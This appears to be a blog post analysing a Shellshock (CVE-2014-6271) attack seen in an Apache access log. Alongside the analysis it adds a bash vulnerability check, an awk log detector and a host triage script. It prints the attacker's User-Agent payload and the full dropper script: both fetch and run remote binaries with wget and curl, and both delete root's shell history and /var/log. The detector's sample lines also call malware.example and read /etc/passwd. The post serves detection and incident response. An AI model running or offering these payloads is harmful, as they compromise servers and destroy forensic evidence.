Bash Vulnerability

Bash Vulnerability, better known as Shellshock (CVE-2014-6271 and its follow-up CVEs), is a family of security bugs in the widely used Unix Bash shell. Bash imported function definitions from environment variables whose value starts with "() {", and vulnerable versions kept parsing and executing whatever followed the function body. Many Internet-facing services, such as web servers running CGI scripts, hand request data to Bash through environment variables (the User-Agent header becomes HTTP_USER_AGENT, for example), so an attacker who controls a header can make a vulnerable Bash execute arbitrary commands. This can give the attacker unauthorized access to the computer system.
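To show the import step just described, here is an added example (it is not code from the original post). It exports a harmless marker payload under the variable name that mod_cgi would use for the User-Agent header, reports whether the local bash executes the part after the function stub, and then shows what a CGI script sees in that variable. The function names check_shellshock and show_import, the HTTP_USER_AGENT default and the MARKER string are this example's own choices.

```shell
#!/bin/sh
# Added example, not from the original post: reproduce the import step that
# Shellshock abuses, using a harmless marker instead of an attacker payload.
# A CGI web server exports each request header as an environment variable
# (User-Agent becomes HTTP_USER_AGENT). A vulnerable bash, when it started,
# parsed a value beginning with "() {" as a function definition and went on
# executing whatever followed the closing brace. A patched bash imports the
# value as an ordinary string.

# Prints "vulnerable" if the bash on PATH executes the trailing command,
# "patched" if it does not, "no-bash" if no bash is installed.
# $1 is the variable name to use; the default is what mod_cgi would set
# for the User-Agent header.
check_shellshock() {
    var="${1:-HTTP_USER_AGENT}"
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 2; }
    # The only thing after the function stub is an echo of a marker string.
    out=$(env "$var=() { :;}; echo MARKER" bash -c 'echo handling-request' 2>/dev/null)
    case "$out" in
        *MARKER*) echo "vulnerable"; return 1 ;;
        *)        echo "patched";    return 0 ;;
    esac
}

# Shows what a CGI script would see in the variable on a patched bash:
# the whole header value, as data, not as a function.
show_import() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 2; }
    env 'HTTP_USER_AGENT=() { :;}; echo MARKER' bash -c 'printf "%s\n" "$HTTP_USER_AGENT"'
}

check_shellshock
show_import
```

On a patched bash the script prints "patched" followed by the literal header value; on a pre-fix bash the word MARKER would appear before "handling-request", which is exactly the behaviour the attacker's "() { :;}; /bin/bash -c ..." header relies on. Passing another name (for example HTTP_COOKIE or HTTP_REFERER) checks that any header-derived variable is treated the same way.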

Here is a real-life example. In the Apache access log, the User-Agent header contains Linux shell commands (the client address and the download URLs are not shown):

- - [09/Aug/2016:18:02:52 +0300] "GET /cgi-bin/login HTTP/1.0" 403 0 "-" "() { :;}; /bin/bash -c \"mkdir /var/.udp; wget -O /tmp/;wget -O /tmp/;curl -o /tmp/;cd /tmp/; GET;fetch;lwp-download;mv /tmp/ /tmp/ ; cat /tmp/ |grep -v 'echo d' >> /tmp/updo ; chmod +x /tmp/updo; chmod +x updo; sh /tmp/updo ;rm -rf /tmp/up*;rm -rf updo*; rm -rf /root/.bash_history; rm -rf /var/log/*\""
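To find lines like the one above in bulk, here is an added example (not code from the original post) that scans an Apache combined-format access log for the "() {" signature, works out which header carried it, and prints the command that follows the function stub. The four log lines are constructed for the demo: the client addresses are documentation ranges and malware.example is a placeholder host, not the domain from the real log.

```shell
#!/bin/sh
# Added example, not from the original post: flag Shellshock attempts in an
# Apache combined-format access log and pull out the command the attacker
# tried to run. The four log lines below are constructed for this demo; the
# client addresses and the malware.example host are placeholders.

SAMPLE_LOG='192.0.2.10 - - [09/Aug/2016:18:02:52 +0300] "GET /cgi-bin/login HTTP/1.0" 403 0 "-" "() { :;}; /bin/bash -c \"wget -O /tmp/x http://malware.example/x; sh /tmp/x\""
198.51.100.7 - - [09/Aug/2016:18:03:10 +0300] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [09/Aug/2016:18:04:01 +0300] "GET /cgi-bin/status HTTP/1.1" 200 0 "() { :; }; echo; /bin/cat /etc/passwd" "curl/7.47.0"
192.0.2.10 - - [09/Aug/2016:18:05:44 +0300] "GET /cgi-bin/login HTTP/1.0" 403 0 "-" "() { :;}; /bin/bash -c \"mkdir /var/.udp; curl -o /tmp/updo http://malware.example/updo; chmod +x /tmp/updo; sh /tmp/updo\""'

# Reads log lines on stdin; prints one tab-separated line per hit:
# client address, timestamp, which header carried the payload, and the
# command that follows the "() { :;};" function stub.
find_shellshock() {
    awk '
    # Split a combined-format line into fields, honouring [...] and "..."
    # groups and the backslash escapes Apache writes inside quoted fields.
    function tokenize(line, out,    n, i, len, c, tok) {
        split("", out); n = 0; i = 1; len = length(line)
        while (i <= len) {
            c = substr(line, i, 1)
            if (c == " ") { i++; continue }
            tok = ""
            if (c == "\"") {
                i++
                while (i <= len) {
                    c = substr(line, i, 1)
                    if (c == "\\") { tok = tok substr(line, i + 1, 1); i += 2; continue }
                    if (c == "\"") { i++; break }
                    tok = tok c; i++
                }
            } else if (c == "[") {
                i++
                while (i <= len && substr(line, i, 1) != "]") { tok = tok substr(line, i, 1); i++ }
                i++
            } else {
                while (i <= len && substr(line, i, 1) != " ") { tok = tok substr(line, i, 1); i++ }
            }
            out[++n] = tok
        }
        return n
    }
    # The signature is "()" followed by "{" with any spacing in between.
    function is_hit(s) { return s ~ /\(\)[ \t]*[{]/ }
    {
        if (tokenize($0, f) < 9) next
        # f[1]=client f[4]=time f[5]=request f[8]=referer f[9]=user-agent
        if (is_hit(f[9]))      { where = "user-agent"; payload = f[9] }
        else if (is_hit(f[8])) { where = "referer";    payload = f[8] }
        else if (is_hit(f[5])) { where = "request";    payload = f[5] }
        else next
        # Drop the empty function body and the separator; keep the real command.
        sub(/^\(\)[ \t]*[{][^}]*[}][ \t]*;[ \t]*/, "", payload)
        printf "%s\t%s\t%s\t%s\n", f[1], f[4], where, payload
    }'
}

# Convenience wrapper: number of hits in the log fed on stdin.
count_shellshock() {
    find_shellshock | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_LOG" | find_shellshock
```

Run it against a real log with `find_shellshock < /var/log/apache2/access.log`. The tokenizer is there because a plain grep on the raw line cannot tell the User-Agent from the Referer, and because Apache writes embedded quotes as \" so the extracted command comes out as the attacker typed it. Note that the 403 in the first constructed line says nothing about success: the header is exported to the CGI environment before the response code is decided, so a blocked request can still have executed the payload.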

Looking at the payload first, we find the domain from which wget (and the other download tools tried in turn: curl, GET, fetch and lwp-download) attempts to fetch more code (

A DNS lookup shows the domain pointing at four servers, each serving the bash script:

# host
has address
has address
has address
has address

We downloaded the script and looked inside it:

# Dropper script fetched by the payload above (download URLs are missing from this copy).
mkdir /tmp/.udp
# Build the list of binaries to fetch: z1..z12 and d2..d7.
echo z1 >> /tmp/upfile
echo z2 >> /tmp/upfile
echo z3 >> /tmp/upfile
echo z4 >> /tmp/upfile
echo z5 >> /tmp/upfile
echo z6 >> /tmp/upfile
echo z7 >> /tmp/upfile
echo z8 >> /tmp/upfile
echo z9 >> /tmp/upfile
echo z10 >> /tmp/upfile
echo z11 >> /tmp/upfile
echo z12 >> /tmp/upfile
echo d2 >> /tmp/upfile
echo d3 >> /tmp/upfile
echo d4 >> /tmp/upfile
echo d5 >> /tmp/upfile
echo d6 >> /tmp/upfile
echo d7 >> /tmp/upfile
# For each name: kill any running copy, download it if it is not already in
# /tmp/.udp, make it executable and run it. The five loops are the same logic
# with a different downloader each (wget, GET, fetch, lwp-download, curl) so
# that at least one of them works on the victim.
for file in $(cat /tmp/upfile); do killall $file; ls /tmp/.udp/$file || wget$file -O /tmp/.udp/$file; chmod +x /tmp/.udp/$file; /tmp/.udp/$file ; done
for file2 in $(cat /tmp/upfile); do killall $file2; cd /tmp/.udp; ls /tmp/.udp/$file2 || GET$file2; chmod +x $file2 ; /tmp/.udp/$file2 ; done
for file3 in $(cat /tmp/upfile); do killall $file3; cd /tmp/.udp; ls /tmp/.udp/$file3 || fetch$file3; chmod +x $file3 ; /tmp/.udp/$file3 ; done
for file4 in $(cat /tmp/upfile); do killall $file4; cd /tmp/.udp; ls /tmp/.udp/$file4 || lwp-download$file4; chmod +x $file4; /tmp/.udp/$file4 ; done
for file5 in $(cat /tmp/upfile); do killall $file5; cd /tmp/.udp; ls /tmp/.udp/$file5 || curl -o$file5; chmod +x $file5; /tmp/.udp/$file5 ; done
# Clean up: remove the name list and the root user's shell history.
rm -rf /tmp/upfile
rm -rf /root/.bash_history

The one-liner in the User-Agent does not run this script as-is. It first filters the script through grep -v 'echo d', which removes the lines that add d2 to d7 to the name list, so only the z1 to z12 binaries are fetched (why the d-files are skipped is not evident from the sample). The filtered copy is saved as /tmp/updo and executed with sh; afterwards the one-liner deletes its temporary files, the root shell history and everything under /var/log to hide the intrusion:

mv /tmp/ /tmp/ ; cat /tmp/ |grep -v 'echo d' >> /tmp/updo ; chmod +x /tmp/updo; chmod +x updo; sh /tmp/updo ;rm -rf /tmp/up*;rm -rf updo*; rm -rf /root/.bash_history; rm -rf /var/log/*\"

Do not try to run this script: the domain is still active and we do not know what these binaries do in a Linux environment. I do not have time at the moment to set up a sandbox and test these binaries!
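Without running the binaries, a host can still be checked for the traces the payload and dropper leave behind. The following is an added example (not from the original post) that looks for the paths named in the log line and the dropper (/var/.udp, /tmp/.udp, /tmp/updo, /tmp/upfile), treats a deleted /root/.bash_history or an emptied /var/log as indicators, and on a live Linux host lists processes still running out of those directories. The optional root-prefix argument is this example's own convention so it can be pointed at a mounted disk image or a test tree instead of the running system; the /proc/<pid>/exe scan is Linux-specific.

```shell
#!/bin/sh
# Added example, not from the original post: quick host triage for the
# artefacts this Shellshock dropper leaves behind. Pass a directory as $1 to
# inspect a mounted image or test tree instead of the live root.
# Returns 0 when nothing was found, 1 otherwise.
triage_shellshock_dropper() {
    root="${1:-}"
    hits=0
    # Directories and staging files named in the payload and the dropper.
    for p in /var/.udp /tmp/.udp /tmp/updo /tmp/upfile; do
        if [ -e "$root$p" ]; then
            echo "present: $p"
            hits=$((hits + 1))
        fi
    done
    # The payload ends with "rm -rf /root/.bash_history" and "rm -rf /var/log/*",
    # so their absence is itself an indicator on a box that should have them.
    if [ -d "$root/root" ] && [ ! -e "$root/root/.bash_history" ]; then
        echo "missing: /root/.bash_history"
        hits=$((hits + 1))
    fi
    if [ -d "$root/var/log" ] && [ -z "$(ls -A "$root/var/log")" ]; then
        echo "emptied: /var/log"
        hits=$((hits + 1))
    fi
    # The dropper starts the binaries and then deletes its files; on Linux a
    # running process keeps /proc/<pid>/exe pointing at the (deleted) path.
    if [ -z "$root" ] && [ -d /proc ]; then
        for exe in /proc/[0-9]*/exe; do
            target=$(readlink "$exe" 2>/dev/null) || continue
            case "$target" in
                /tmp/.udp/*|/var/.udp/*)
                    echo "running: $exe -> $target"
                    hits=$((hits + 1)) ;;
            esac
        done
    fi
    echo "indicators: $hits"
    [ "$hits" -eq 0 ]
}

triage_shellshock_dropper "$@"
```

Run it as root on the suspect host (`sh triage.sh`) or against an image mounted read-only (`sh triage.sh /mnt/image`). A non-zero exit with any "running:" line means the malware is still active and the binary can be copied out of /proc/<pid>/exe for analysis even though the file on disk is gone; with the logs wiped, the web server's access log on a remote log collector is usually the only remaining record of the initial request.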